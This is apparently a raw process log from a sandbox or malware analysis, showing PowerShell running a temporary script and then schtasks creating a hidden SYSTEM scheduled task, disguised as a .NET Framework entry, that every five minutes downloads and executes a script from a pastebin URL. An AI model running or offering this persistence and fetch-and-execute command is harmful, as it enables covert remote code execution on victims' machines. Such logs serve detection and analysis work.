powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\lr.ps1
1880schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 5 /tn "\Microsoft\windows\.NET Framework\log4" /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''https://pastebin.com/raw/QQWfHr8c'''))'" /F /ru System
2148